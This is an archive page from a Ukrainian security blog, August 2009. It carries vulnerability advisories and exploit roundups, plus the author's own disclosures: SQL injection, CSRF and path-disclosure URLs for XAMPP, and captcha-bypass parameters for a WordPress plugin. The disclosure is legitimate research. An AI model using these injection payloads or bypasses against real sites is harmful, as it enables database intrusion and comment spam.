Архів за Серпень, 2009

« Попередні записи
Наступні записи »

Технічні проблеми

02:08 14.08.2009

У зв’язку з технічними проблемами у хостинг провайдера, мій сайт тимчасово не працював. І хоча я намагався вирішити цю проблему, по можливості швидко, з моїм попереднім хостером, зробити цього не вдалося (вирішення даної проблеми затягнулося, хоча, на мій погляд, це питання можна було вирішити ще 12 серпня, максимум 13 серпня).

Тому я переїхав до іншого хостинг провайдера. Так що мій веб проект продовжує роботу в звичному режимі ;-) .

Опубліковано в Новини сайту | Без Коментарів »

Cross-Site Scripting уразливість в WordPress 2.8.1

23:57 11.08.2009

Наприкінці липня була оприлюднена Cross-Site Scripting уразливість в WordPress. Уразливі WordPress 2.8.1 та попередні версії.

Використовуючи дану уразливість в WP можна проводити обмежені XSS атаки, зокрема для редирекції адміна на довільний сайт.

  • Wordpress 2.8.1 (url) Remote Cross Site Scripting Exploit (деталі)

Опубліковано в Новини сайту, Уразливості | Без Коментарів »

Вийшов WordPress 2.7.1

22:23 11.08.2009

У лютому, 10.02.2009, вийшла нова версія WordPress 2.7.1 (тільки зараз знайшов час, щоб про це написати). Даний випуск відбувся через два місяці після виходу WP 2.7.

WordPress 2.7.1 це багфікс випуск 2.7 серії. В ній виправлено 68 багів.

Опубліковано в Новини сайту, Програми | Без Коментарів »

Цілочисленне переповнення в Adobe Flash Player та AIR

20:22 11.08.2009

Виявлене цілочисленне переповнення в Adobe Flash Player та AIR.

Уразливі продукти: Adobe Flash Player 10.0, AIR 1.5.

Цілочисленне переповнення в полі intf_count структури instance_info.

  • Adobe Flash Player Invalid Loader Object Reference Vulnerability (деталі)
  • Adobe Flash Player URL Parsing Heap Overflow Vulnerability (деталі)
  • Advisory: Adobe Flash Player and AIR AVM2 intf_count Integer Overflow Remote Code Execution (CVE-2009-1869) (деталі)

Опубліковано в Новини, Помилки | Без Коментарів »

Добірка уразливостей

17:34 11.08.2009

В даній добірці уразливості в веб додатках:

  • CenterIM <= 4.22.3 Remote Command Execution Vulnerability (деталі)
  • PhpWebGallery 1.3.4 Multiple Vulnerabilities (XSS/LFI) (деталі)
  • Surgemail 38k4 IMAP server remote stack overflow (деталі)
  • VMSA-2008-0015 Updated ESXi and ESX 3.5 packages address critical security issue in openwsman (деталі)
  • Advanced Electron Forum <= 1.0.6 Remote Code Execution (деталі)
  • Annuaire Telephonique v1.0 Sensetive Files (MDP) (деталі)
  • PHP pro bid v 6.04 SQL injection (деталі)
  • LooYu Web IM 2008 Cross-Site Scripting Vulnerabilities (деталі)
  • cyask 3.x Local File Inclusion Vulnerability (деталі)
  • Sama XSS Bug (деталі)

Опубліковано в Уразливості | Без Коментарів »

Уразливість в Dumb math captcha плагіні для WordPress

23:51 08.08.2009

Вчора, 07.08.2009, коли я оприлюднив уразливості в Dumb math captcha для WordPress, я виявив нову Insufficient Anti-automation уразливість Dumb math captcha плагіні для WordPress.

Insufficient Anti-automation:

При передачі параметра action зі значенням commentopenid, значення відповіді капчі не перевіряється, що дозволяє обійти капчу (на сторінках записів). Це автор плагіна зробив чорний хід (backdoor) в капчі, який може бути використаний для її обходу. Така собі spamer friendly капча :-) .

Dumb math captcha CAPTCHA bypass.html

Уразлива версія Dumb math captcha 1.0.

Опубліковано в Новини сайту, Уразливості | Без Коментарів »

Основи хакінга

22:40 08.08.2009

В своїй презентації The fundamentals of Hacking, Jen Johnson та Miria Grunick розповідають про основи хакінга в Інтернеті.

Опубліковано в Статті | Без Коментарів »

CSRF, SQL Injection та Full path disclosure уразливості в XAMPP

19:23 08.08.2009

01.07.2009

У червні, 27.06.2009, я знайшов Cross-Site Request Forgery, SQL Injection та Full path disclosure уразливості в XAMPP. Про що найближчим часом сповіщу розробникам.

Раніше я вже писав про уразливості в XAMPP.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

08.08.2009

CSRF:

http://site/xampp/cds-fpdf.php

Можна видаляти та додавати дані в тестовій таблиці (як через CSRF, так і через Insufficient Authorization уразливості). А також проводити SQL Injection через CSRF атаки.

SQL Injection:

http://site/xampp/cds-fpdf.php?action=del&id=-1%20or%201=1 (register globals on)

http://site/xampp/cds-fpdf.php?interpret=1&titel=1&jahr=1),(version(),1,1

http://site/xampp/cds-fpdf.php?interpret=1&titel=',1,1),(version(),1,1)/* (mq off)

http://site/xampp/cds-fpdf.php?titel=1&interpret=',1),(version(),1,1)/* (mq off)

Атака можлива при доступі в адмінку (через Insufficient Authorization), або через CSRF.

Full path disclosure:

http://site/xampp/external/ps/draw.php
http://site/xampp/external/ps/hyperlinks.php
http://site/xampp/external/ps/image.php
http://site/xampp/external/ps/overprint.php
http://site/xampp/external/ps/ps.php?submit=OK
http://site/xampp/external/ps/shading.php
http://site/xampp/external/ps/spotcolor.php
http://site/xampp/external/ps/text.php
http://site/xampp/special/ps/draw.php
http://site/xampp/special/ps/hyperlinks.php
http://site/xampp/special/ps/image.php
http://site/xampp/special/ps/overprint.php
http://site/xampp/special/ps/ps.php?submit=OK
http://site/xampp/special/ps/shading.php
http://site/xampp/special/ps/spotcolor.php
http://site/xampp/special/ps/text.php

Уразливі XAMPP 1.6.8 та попередні версії. Та потенційно наступні версії (включно з останньою версією XAMPP 1.7.1).

Опубліковано в Уразливості | Без Коментарів »

Добірка експлоітів

16:12 08.08.2009

В даній добірці експлоіти в веб додатках:

  • Perception LiteServe 2.0.1 (user) Remote Buffer Overflow PoC (деталі)
  • QuoteBook (poll.inc) Remote Config File Disclosure Vulnerability (деталі)
  • PHP-Fusion Mod E-Cart 1.3 (items.php CA) SQL Injection Vulnerability (деталі)
  • PHP-Fusion Mod Members CV (job) 1.0 SQL Injection Vulnerability (деталі)
  • CuteNews <= 1.4.6 (ip ban) Command Execution Exploit (admin req.) (деталі)
  • Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit (деталі)
  • PHP-Fusion Mod vArcade 1.8 (comment_id) SQL Injection Vulnerability (деталі)
  • XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit (деталі)
  • Fast FAQs System (Auth Bypass) SQL Injection Vulnerability (деталі)
  • Photobase 1.2 (language) Local File Inclusion Vulnerability (деталі)
  • Silentum Uploader 1.4.0 Remote File Deletion Exploit (деталі)
  • fttss <= 2.0 Remote Command Execution Vulnerability (деталі)
  • Social Engine (browse_classifieds.php s) SQL Injection Vulnerability (деталі)
  • PHP-Fusion Mod the_kroax (comment_id) SQL Injection Vulnerability (деталі)
  • Exploits Ezphotogallery Multiple Vulnerabilities (Xss/Login Bypass/Sql injection Exploit/File Disclosure) (деталі)

Опубліковано в Експлоіти | Без Коментарів »

Уразливості в Dumb math captcha для WordPress

23:56 07.08.2009

Сьогодні я вияснив, що капча плагін для WordPress, в якому я виявив дірки, що використовуться на сайті www.developers.org.ua, зветься Dumb math captcha. Тобто це не окремий php-скрипт від власників www.developers.org.ua (бо адміни сайта так мені й не відповіли), а саме плагін для WP, який використовувався на декількох сайтах. І враховуючи, що вихідний код цього плагіна доступний в Мережі, його також можуть використати інші люди.

Тому Insufficient Anti-automation та Full path disclosure уразливості, що я знайшов у січні, 22.01.2008, мають місце у Dumb math captcha плагіні для WordPress.

Insufficient Anti-automation:

Капча на сторінках записів вразлива до Constant values bypass method, що я описав в проекті Місяць багів в Капчах.

Для атаки потрібно посилати одне і те саме значення параметра dumb_captcha (dumb_captcha = 9).

Full path disclosure:

http://site/wp-content/plugins/dumb_captcha.php

Уразлива версія Dumb math captcha 1.0.

Опубліковано в Новини сайту, Уразливості | Без Коментарів »


« Попередні записи
Наступні записи »